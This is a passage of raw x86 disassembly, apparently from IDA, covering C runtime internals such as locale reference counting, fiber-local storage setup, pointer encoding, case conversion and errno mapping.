retn
; END OF FUNCTION CHUNK FOR sub_404C69
; =============== S U B R O U T I N E =======================================
sub_404E03 proc near ; CODE XREF: sub_40AB84+C�p
; sub_40ABE1+D�p ...
cmp ds:dword_434DD4, 0
jnz short loc_404E1E
push 0FFFFFFFDh
call sub_404C69
pop ecx
mov ds:dword_434DD4, 1
loc_404E1E: ; CODE XREF: sub_404E03+7�j
xor eax, eax
retn
sub_404E03 endp
; =============== S U B R O U T I N E =======================================
sub_404E21 proc near ; CODE XREF: sub_405073+31�p
; sub_4053B5+E8�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_404EA4
cmp eax, offset off_423F38
jz short loc_404EA4
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_404EA4
cmp [eax], ebp
jnz short loc_404EA4
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_404E6B
cmp [eax], ebp
jnz short loc_404E6B
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C704
pop ecx
pop ecx
loc_404E6B: ; CODE XREF: sub_404E21+31�j
; sub_404E21+35�j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_404E8C
cmp [eax], ebp
jnz short loc_404E8C
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C6C4
pop ecx
pop ecx
loc_404E8C: ; CODE XREF: sub_404E21+52�j
; sub_404E21+56�j
push dword ptr [esi+0B0h]
call sub_403603
push dword ptr [esi+0BCh]
call sub_403603
pop ecx
pop ecx
loc_404EA4: ; CODE XREF: sub_404E21+12�j
; sub_404E21+19�j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_404EF2
cmp [eax], ebp
jnz short loc_404EF2
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_403603
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_403603
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_403603
push dword ptr [esi+0C0h]
call sub_403603
add esp, 10h
loc_404EF2: ; CODE XREF: sub_404E21+8B�j
; sub_404E21+8F�j
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_423E78
jz short loc_404F18
cmp [eax+0B4h], ebp
jnz short loc_404F18
push eax
call sub_40C534
push dword ptr [edi]
call sub_403603
pop ecx
pop ecx
loc_404F18: ; CODE XREF: sub_404E21+DE�j
; sub_404E21+E6�j
push 6
lea edi, [esi+50h]
pop ebx
loc_404F1E: ; CODE XREF: sub_404E21+132�j
cmp dword ptr [edi-8], offset dword_423598
jz short loc_404F38
mov eax, [edi]
cmp eax, ebp
jz short loc_404F38
cmp [eax], ebp
jnz short loc_404F38
push eax
call sub_403603
pop ecx
loc_404F38: ; CODE XREF: sub_404E21+104�j
; sub_404E21+10A�j ...
cmp [edi-4], ebp
jz short loc_404F4F
mov eax, [edi+4]
cmp eax, ebp
jz short loc_404F4F
cmp [eax], ebp
jnz short loc_404F4F
push eax
call sub_403603
pop ecx
loc_404F4F: ; CODE XREF: sub_404E21+11A�j
; sub_404E21+121�j ...
add edi, 10h
dec ebx
jnz short loc_404F1E
push esi
call sub_403603
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404E21 endp
; =============== S U B R O U T I N E =======================================
sub_404F61 proc near ; CODE XREF: sub_405073+12�p
; sub_405266+93�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, ds:dword_41D1B8
push esi
call edi
mov eax, [esi+0B0h]
test eax, eax
jz short loc_404F7F
push eax
call edi
loc_404F7F: ; CODE XREF: sub_404F61+19�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_404F8C
push eax
call edi
loc_404F8C: ; CODE XREF: sub_404F61+26�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_404F99
push eax
call edi
loc_404F99: ; CODE XREF: sub_404F61+33�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_404FA6
push eax
call edi
loc_404FA6: ; CODE XREF: sub_404F61+40�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_404FAC: ; CODE XREF: sub_404F61+71�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_404FBE
mov eax, [ebx]
test eax, eax
jz short loc_404FBE
push eax
call edi
loc_404FBE: ; CODE XREF: sub_404F61+52�j
; sub_404F61+58�j
cmp dword ptr [ebx-4], 0
jz short loc_404FCE
mov eax, [ebx+4]
test eax, eax
jz short loc_404FCE
push eax
call edi
loc_404FCE: ; CODE XREF: sub_404F61+61�j
; sub_404F61+68�j
add ebx, 10h
dec ebp
jnz short loc_404FAC
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404F61 endp
; =============== S U B R O U T I N E =======================================
sub_404FE7 proc near ; CODE XREF: sub_405073+1D�p
; sub_4053B5+CC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40506F
push ebx
push ebp
push edi
mov edi, ds:dword_41D1BC
push esi
call edi
mov eax, [esi+0B0h]
test eax, eax
jz short loc_405009
push eax
call edi
loc_405009: ; CODE XREF: sub_404FE7+1D�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_405016
push eax
call edi
loc_405016: ; CODE XREF: sub_404FE7+2A�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_405023
push eax
call edi
loc_405023: ; CODE XREF: sub_404FE7+37�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_405030
push eax
call edi
loc_405030: ; CODE XREF: sub_404FE7+44�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_405036: ; CODE XREF: sub_404FE7+75�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_405048
mov eax, [ebx]
test eax, eax
jz short loc_405048
push eax
call edi
loc_405048: ; CODE XREF: sub_404FE7+56�j
; sub_404FE7+5C�j
cmp dword ptr [ebx-4], 0
jz short loc_405058
mov eax, [ebx+4]
test eax, eax
jz short loc_405058
push eax
call edi
loc_405058: ; CODE XREF: sub_404FE7+65�j
; sub_404FE7+6C�j
add ebx, 10h
dec ebp
jnz short loc_405036
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi
pop edi
pop ebp
pop ebx
loc_40506F: ; CODE XREF: sub_404FE7+7�j
mov eax, esi
pop esi
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
sub_405073 proc near ; CODE XREF: sub_4050B1+54�p
test edi, edi
jz short loc_4050AE
test eax, eax
jz short loc_4050AE
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_4050AA
push edi
mov [eax], edi
call sub_404F61
test esi, esi
pop ecx
jz short loc_4050AA
push esi
call sub_404FE7
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4050AA
cmp esi, offset dword_4235A0
jz short loc_4050AA
push esi
call sub_404E21
pop ecx
loc_4050AA: ; CODE XREF: sub_405073+D�j
; sub_405073+1A�j ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4050AE: ; CODE XREF: sub_405073+2�j
; sub_405073+6�j
xor eax, eax
retn
sub_405073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050B1 proc near ; CODE XREF: sub_40271F+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421470
call __SEH_prolog4
call sub_40539D
mov esi, eax
mov eax, ds:dword_423594
test [esi+70h], eax
jz short loc_4050F0
cmp dword ptr [esi+6Ch], 0
jz short loc_4050F0
call sub_40539D
mov esi, [eax+6Ch]
loc_4050DC: ; CODE XREF: sub_4050B1+68�j
test esi, esi
jnz short loc_4050E8
push 20h
call sub_40785D
pop ecx
loc_4050E8: ; CODE XREF: sub_4050B1+2D�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4050F0: ; CODE XREF: sub_4050B1+1B�j
; sub_4050B1+21�j
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, ds:off_423678
call sub_405073
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40511B
jmp short loc_4050DC
sub_4050B1 endp
; =============== S U B R O U T I N E =======================================
sub_40511B proc near ; CODE XREF: sub_4050B1+63�p
; DATA XREF: .kSjx934:00421488�o
push 0Ch
call sub_40591F
pop ecx
mov esi, [ebp-1Ch]
retn
sub_40511B endp
; =============== S U B R O U T I N E =======================================
sub_405127 proc near ; CODE XREF: sub_402D09+81�p
; sub_402D09+96�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_42368C
mov esi, ds:dword_41D184
call esi
test eax, eax
jz short loc_40515B
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_40515B
push eax
push ds:dword_42368C
call esi
call eax
test eax, eax
jz short loc_40515B
mov eax, [eax+1F8h]
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_40515B: ; CODE XREF: sub_405127+11�j
; sub_405127+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
test eax, eax
jz short loc_405184
push offset aEncodepointer ; "EncodePointer"
push eax
call ds:dword_41D0EC
loc_405176: ; CODE XREF: sub_405127+32�j
test eax, eax
jz short loc_405184
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_405184: ; CODE XREF: sub_405127+41�j
; sub_405127+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405127 endp
; =============== S U B R O U T I N E =======================================
sub_40518A proc near ; CODE XREF: sub_407B19+1�p
; sub_40B915+2F�p ...
push 0
call sub_405127
pop ecx
retn
sub_40518A endp
; =============== S U B R O U T I N E =======================================
sub_405193 proc near ; CODE XREF: sub_402D09+B�p
; sub_402D09+1C�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_42368C
mov esi, ds:dword_41D184
call esi
test eax, eax
jz short loc_4051C7
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_4051C7
push eax
push ds:dword_42368C
call esi
call eax
test eax, eax
jz short loc_4051C7
mov eax, [eax+1FCh]
jmp short loc_4051E2
; ---------------------------------------------------------------------------
loc_4051C7: ; CODE XREF: sub_405193+11�j
; sub_405193+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
test eax, eax
jz short loc_4051F0
push offset aDecodepointer ; "DecodePointer"
push eax
call ds:dword_41D0EC
loc_4051E2: ; CODE XREF: sub_405193+32�j
test eax, eax
jz short loc_4051F0
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4051F0: ; CODE XREF: sub_405193+41�j
; sub_405193+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405193 endp
; =============== S U B R O U T I N E =======================================
sub_4051F6 proc near ; DATA XREF: sub_4054D6+8A�o
call ds:dword_41D180
retn 4
sub_4051F6 endp
; =============== S U B R O U T I N E =======================================
sub_4051FF proc near ; CODE XREF: sub_40531A+A�p
push ds:dword_42368C
call ds:dword_41D184
test eax, eax
jnz short locret_405228
push ds:dword_425E08
call sub_405193
pop ecx
push eax
push ds:dword_42368C
call ds:dword_41D17C
locret_405228: ; CODE XREF: sub_4051FF+E�j
retn
sub_4051FF endp
; =============== S U B R O U T I N E =======================================
sub_405229 proc near ; CODE XREF: sub_4054D6+12�p
; sub_4054D6:loc_405650�p
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_405249
push eax
push ds:dword_425E10
call sub_405193
pop ecx
call eax
or ds:dword_423688, 0FFFFFFFFh
loc_405249: ; CODE XREF: sub_405229+8�j
mov eax, ds:dword_42368C
cmp eax, 0FFFFFFFFh
jz short loc_405261
push eax
call ds:dword_41D178
or ds:dword_42368C, 0FFFFFFFFh
loc_405261: ; CODE XREF: sub_405229+28�j
jmp sub_4058CA
sub_405229 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405266 proc near ; CODE XREF: sub_40531A+59�p
; sub_4054D6+162�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_421490
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_423DC0
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_4052B8
push offset aEncodepointer ; "EncodePointer"
push eax
mov ebx, ds:dword_41D0EC
call ebx
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx
mov [esi+1FCh], eax
loc_4052B8: ; CODE XREF: sub_405266+2C�j
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_423070
mov [esi+68h], eax
push eax
call ds:dword_41D1B8
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_4052F6
mov eax, ds:off_423678
mov [esi+6Ch], eax
loc_4052F6: ; CODE XREF: sub_405266+86�j
push dword ptr [esi+6Ch]
call sub_404F61
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405311
call __SEH_epilog4
retn
sub_405266 endp
; =============== S U B R O U T I N E =======================================
sub_405311 proc near ; CODE XREF: sub_405266+A0�p
; DATA XREF: .kSjx934:004214A8�o
push 0Ch
call sub_40591F
pop ecx
retn
sub_405311 endp
; =============== S U B R O U T I N E =======================================
sub_40531A proc near ; CODE XREF: sub_40539D+1�p sub_4057D3�p ...
push esi
push edi
call ds:dword_41D0F0
mov edi, eax
call sub_4051FF
push ds:dword_423688
push ds:dword_42368C
call ds:dword_41D184
call eax
mov esi, eax
test esi, esi
jnz short loc_405391
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405391
push esi
push ds:dword_423688
push ds:dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405388
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_405391
; ---------------------------------------------------------------------------
loc_405388: ; CODE XREF: sub_40531A+54�j
push esi
call sub_403603
pop ecx
xor esi, esi
loc_405391: ; CODE XREF: sub_40531A+27�j
; sub_40531A+3B�j ...
push edi
call ds:dword_41D174
pop edi
mov eax, esi
pop esi
retn
sub_40531A endp
; =============== S U B R O U T I N E =======================================
sub_40539D proc near ; CODE XREF: sub_40271F+F�p sub_403356�p ...
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_4053B1
push 10h
call sub_40785D
pop ecx
loc_4053B1: ; CODE XREF: sub_40539D+A�j
mov eax, esi
pop esi
retn
sub_40539D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B5 proc near ; DATA XREF: sub_4054D6+115�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_4214B0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4054B6
mov eax, [esi+24h]
test eax, eax
jz short loc_4053DA
push eax
call sub_403603
pop ecx
loc_4053DA: ; CODE XREF: sub_4053B5+1C�j
mov eax, [esi+2Ch]
test eax, eax
jz short loc_4053E8
push eax
call sub_403603
pop ecx
loc_4053E8: ; CODE XREF: sub_4053B5+2A�j
mov eax, [esi+34h]
test eax, eax
jz short loc_4053F6
push eax
call sub_403603
pop ecx
loc_4053F6: ; CODE XREF: sub_4053B5+38�j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_405404
push eax
call sub_403603
pop ecx
loc_405404: ; CODE XREF: sub_4053B5+46�j
mov eax, [esi+44h]
test eax, eax
jz short loc_405412
push eax
call sub_403603
pop ecx
loc_405412: ; CODE XREF: sub_4053B5+54�j
mov eax, [esi+48h]
test eax, eax
jz short loc_405420
push eax
call sub_403603
pop ecx
loc_405420: ; CODE XREF: sub_4053B5+62�j
mov eax, [esi+5Ch]
cmp eax, offset dword_423DC0
jz short loc_405431
push eax
call sub_403603
pop ecx
loc_405431: ; CODE XREF: sub_4053B5+73�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_40545E
push edi
call ds:dword_41D1BC
test eax, eax
jnz short loc_40545E
cmp edi, offset dword_423070
jz short loc_40545E
push edi
call sub_403603
pop ecx
loc_40545E: ; CODE XREF: sub_4053B5+8D�j
; sub_4053B5+98�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054C1
push 0Ch
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_4054A3
push edi
call sub_404FE7
pop ecx
cmp edi, ds:off_423678
jz short loc_4054A3
cmp edi, offset dword_4235A0
jz short loc_4054A3
cmp dword ptr [edi], 0
jnz short loc_4054A3
push edi
call sub_404E21
pop ecx
loc_4054A3: ; CODE XREF: sub_4053B5+C9�j
; sub_4053B5+D8�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054CD
push esi
call sub_403603
pop ecx
loc_4054B6: ; CODE XREF: sub_4053B5+11�j
call __SEH_epilog4
retn 4
sub_4053B5 endp
; =============== S U B R O U T I N E =======================================
sub_4054BE proc near ; DATA XREF: .kSjx934:004214C8�o
mov esi, [ebp+8]
sub_4054BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054C1 proc near ; CODE XREF: sub_4053B5+B0�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_4054C1 endp
; =============== S U B R O U T I N E =======================================
sub_4054CA proc near ; DATA XREF: .kSjx934:004214D4�o
mov esi, [ebp+8]
sub_4054CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054CD proc near ; CODE XREF: sub_4053B5+F5�p
push 0Ch
call sub_40591F
pop ecx
retn
sub_4054CD endp
; =============== S U B R O U T I N E =======================================
sub_4054D6 proc near ; CODE XREF: .kSjx934:loc_40401B�p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
mov edi, eax
test edi, edi
jnz short loc_4054F1
call sub_405229
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4054F1: ; CODE XREF: sub_4054D6+10�j
push esi
mov esi, ds:dword_41D0EC
push offset dword_41D4D4
push edi
call esi
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov ds:dword_425E04, eax
call esi
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov ds:dword_425E08, eax
call esi
push offset aFlsfree ; "FlsFree"
push edi
mov ds:dword_425E0C, eax
call esi
cmp ds:dword_425E04, 0
mov esi, ds:dword_41D17C
mov ds:dword_425E10, eax
jz short loc_405551
cmp ds:dword_425E08, 0
jz short loc_405551
cmp ds:dword_425E0C, 0
jz short loc_405551
test eax, eax
jnz short loc_405575
loc_405551: ; CODE XREF: sub_4054D6+63�j
; sub_4054D6+6C�j ...
mov eax, ds:dword_41D184
mov ds:dword_425E08, eax
mov eax, ds:dword_41D178
mov ds:dword_425E04, offset sub_4051F6
mov ds:dword_425E0C, esi
mov ds:dword_425E10, eax
loc_405575: ; CODE XREF: sub_4054D6+79�j
call ds:dword_41D180
cmp eax, 0FFFFFFFFh
mov ds:dword_42368C, eax
jz loc_405655
push ds:dword_425E08
push eax
call esi
test eax, eax
jz loc_405655
call sub_407B19
push ds:dword_425E04
call sub_405127
push ds:dword_425E08
mov ds:dword_425E04, eax
call sub_405127
push ds:dword_425E0C
mov ds:dword_425E08, eax
call sub_405127
push ds:dword_425E10
mov ds:dword_425E0C, eax
call sub_405127
add esp, 10h
mov ds:dword_425E10, eax
call sub_405881
test eax, eax
jz short loc_405650
push offset sub_4053B5
push ds:dword_425E04
call sub_405193
pop ecx
call eax
cmp eax, 0FFFFFFFFh
mov ds:dword_423688, eax
jz short loc_405650
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405650
push esi
push ds:dword_423688
push ds:dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405650
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_405657
; ---------------------------------------------------------------------------
loc_405650: ; CODE XREF: sub_4054D6+113�j
; sub_4054D6+130�j ...
call sub_405229
loc_405655: ; CODE XREF: sub_4054D6+AD�j
; sub_4054D6+BE�j
xor eax, eax
loc_405657: ; CODE XREF: sub_4054D6+178�j
pop esi
pop edi
retn
sub_4054D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40565A proc near ; CODE XREF: sub_4027D6+9B�p
; sub_4027D6+AD�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
mov esi, 100h
cmp ebx, esi
jnb short loc_4056CD
mov ecx, [ebp+var_18]
cmp dword ptr [ecx+0ACh], 1
jle short loc_405699
lea eax, [ebp+var_18]
push eax
push 1
push ebx
call sub_40CA44
mov ecx, [ebp+var_18]
add esp, 0Ch
jmp short loc_4056A6
; ---------------------------------------------------------------------------
loc_405699: ; CODE XREF: sub_40565A+29�j
mov eax, [ecx+0C8h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 1
loc_4056A6: ; CODE XREF: sub_40565A+3D�j
test eax, eax
jz short loc_4056B9
mov eax, [ecx+0CCh]
movzx eax, byte ptr [eax+ebx]
jmp loc_405760
; ---------------------------------------------------------------------------
loc_4056B9: ; CODE XREF: sub_40565A+4E�j
; sub_40565A+EA�j
cmp [ebp+var_C], 0
jz short loc_4056C6
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4056C6: ; CODE XREF: sub_40565A+63�j
mov eax, ebx
jmp loc_40576D
; ---------------------------------------------------------------------------
loc_4056CD: ; CODE XREF: sub_40565A+1D�j
mov eax, [ebp+var_18]
cmp dword ptr [eax+0ACh], 1
jle short loc_40570A
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40570A
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop ecx
jmp short loc_40571F
; ---------------------------------------------------------------------------
loc_40570A: ; CODE XREF: sub_40565A+7D�j
; sub_40565A+9C�j
call sub_4057D3
mov dword ptr [eax], 2Ah
xor ecx, ecx
mov [ebp+var_4], bl
mov [ebp+var_3], 0
inc ecx
loc_40571F: ; CODE XREF: sub_40565A+AE�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+4]
lea edx, [ebp+var_8]
push 3
push edx
push ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push dword ptr [eax+14h]
lea eax, [ebp+var_18]
push eax
call sub_40C2F9
add esp, 24h
test eax, eax
jz loc_4056B9
cmp eax, 1
jnz short loc_405755
movzx eax, [ebp+var_8]
jmp short loc_405760
; ---------------------------------------------------------------------------
loc_405755: ; CODE XREF: sub_40565A+F3�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
loc_405760: ; CODE XREF: sub_40565A+5A�j
; sub_40565A+F9�j
cmp [ebp+var_C], 0
jz short loc_40576D
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40576D: ; CODE XREF: sub_40565A+6E�j
; sub_40565A+10A�j
pop esi
pop ebx
leave
retn
sub_40565A endp
; =============== S U B R O U T I N E =======================================
sub_405771 proc near ; CODE XREF: sub_4108BD+19�p
; sub_4108BD+36�p
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40578A
mov eax, [esp+arg_0]
lea ecx, [eax-41h]
cmp ecx, 19h
ja short locret_405797
add eax, 20h
retn
; ---------------------------------------------------------------------------
loc_40578A: ; CODE XREF: sub_405771+7�j
push 0
push [esp+4+arg_0]
call sub_40565A
pop ecx
pop ecx
locret_405797: ; CODE XREF: sub_405771+13�j
retn
sub_405771 endp
; =============== S U B R O U T I N E =======================================
sub_405798 proc near ; CODE XREF: sub_403603+80�p
; sub_4057F9+D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_40579E: ; CODE XREF: sub_405798+13�j
cmp eax, ds:dword_423690[ecx*8]
jz short loc_4057B9
inc ecx
cmp ecx, 2Dh
jl short loc_40579E
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_4057C1
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: sub_405798+D�j
mov eax, ds:dword_423694[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_4057C1: ; CODE XREF: sub_405798+1B�j
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_405798 endp
; =============== S U B R O U T I N E =======================================
sub_4057D3 proc near ; CODE XREF: sub_4027D6+19�p
; sub_4027D6+4F�p ...
call sub_40531A
test eax, eax
jnz short loc_4057E2
mov eax, offset dword_4237F8
retn
; ---------------------------------------------------------------------------
loc_4057E2: ; CODE XREF: sub_4057D3+7�j
add eax, 8
retn
sub_4057D3 endp
; =============== S U B R O U T I N E =======================================
sub_4057E6 proc near ; CODE XREF: sub_4057F9+1�p
; sub_408AE1+14�p ...
call sub_40531A
test eax, eax
jnz short loc_4057F5
mov eax, offset dword_4237FC
retn
; ---------------------------------------------------------------------------
loc_4057F5: ; CODE XREF: sub_4057E6+7�j
add eax, 0Ch
retn
sub_4057E6 endp
; =============== S U B R O U T I N E =======================================
sub_4057F9 proc near ; CODE XREF: sub_408A4D+84�p
; sub_409DAD+3FB�p ...
arg_0 = dword ptr 4
push esi
call sub_4057E6
mov ecx, [esp+4+arg_0]
push ecx
mov [eax], ecx
call sub_405798
pop ecx
mov esi, eax
call sub_4057D3
mov [eax], esi
pop esi
retn
sub_4057F9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405820 proc near ; CODE XREF: sub_4028F9+9A�p
; sub_4029E9+42�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz short loc_40587A
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_40583C: ; CODE XREF: sub_405820+49�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_40586B
or al, al
jz short loc_40586B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_405858
cmp ah, bl
ja short loc_405858
add ah, dh
loc_405858: ; CODE XREF: sub_405820+30�j
; sub_405820+34�j
cmp al, bh
jb short loc_405862
cmp al, bl
ja short loc_405862
add al, dh
loc_405862: ; CODE XREF: sub_405820+3A�j
; sub_405820+3E�j
cmp ah, al
jnz short loc_405871
sub ecx, 1
jnz short loc_40583C
loc_40586B: ; CODE XREF: sub_405820+22�j
; sub_405820+26�j
xor ecx, ecx
cmp ah, al
jz short loc_40587A
loc_405871: ; CODE XREF: sub_405820+44�j
mov ecx, 0FFFFFFFFh
jb short loc_40587A
neg ecx
loc_40587A: ; CODE XREF: sub_405820+B�j
; sub_405820+4F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_405820 endp
; =============== S U B R O U T I N E =======================================
sub_405881 proc near ; CODE XREF: sub_4054D6+10C�p
push esi
push edi
xor esi, esi
mov edi, offset dword_425E18
loc_40588A: ; CODE XREF: sub_405881+35�j
cmp ds:dword_423804[esi*8], 1
jnz short loc_4058B2
lea eax, ds:423800h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_40CB14
test eax, eax
pop ecx
pop ecx
jz short loc_4058BE
loc_4058B2: ; CODE XREF: sub_405881+11�j
inc esi
cmp esi, 24h
jl short loc_40588A
xor eax, eax
inc eax
loc_4058BB: ; CODE XREF: sub_405881+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4058BE: ; CODE XREF: sub_405881+2F�j
and ds:dword_423800[esi*8], 0
xor eax, eax
jmp short loc_4058BB
sub_405881 endp
; =============== S U B R O U T I N E =======================================
sub_4058CA proc near ; CODE XREF: sub_405229:loc_405261�j
push ebx
mov ebx, ds:dword_41D170
push esi
mov esi, offset dword_423800
push edi
loc_4058D8: ; CODE XREF: sub_4058CA+30�j
mov edi, [esi]
test edi, edi
jz short loc_4058F1
cmp dword ptr [esi+4], 1
jz short loc_4058F1
push edi
call ebx
push edi
call sub_403603
and dword ptr [esi], 0
pop ecx
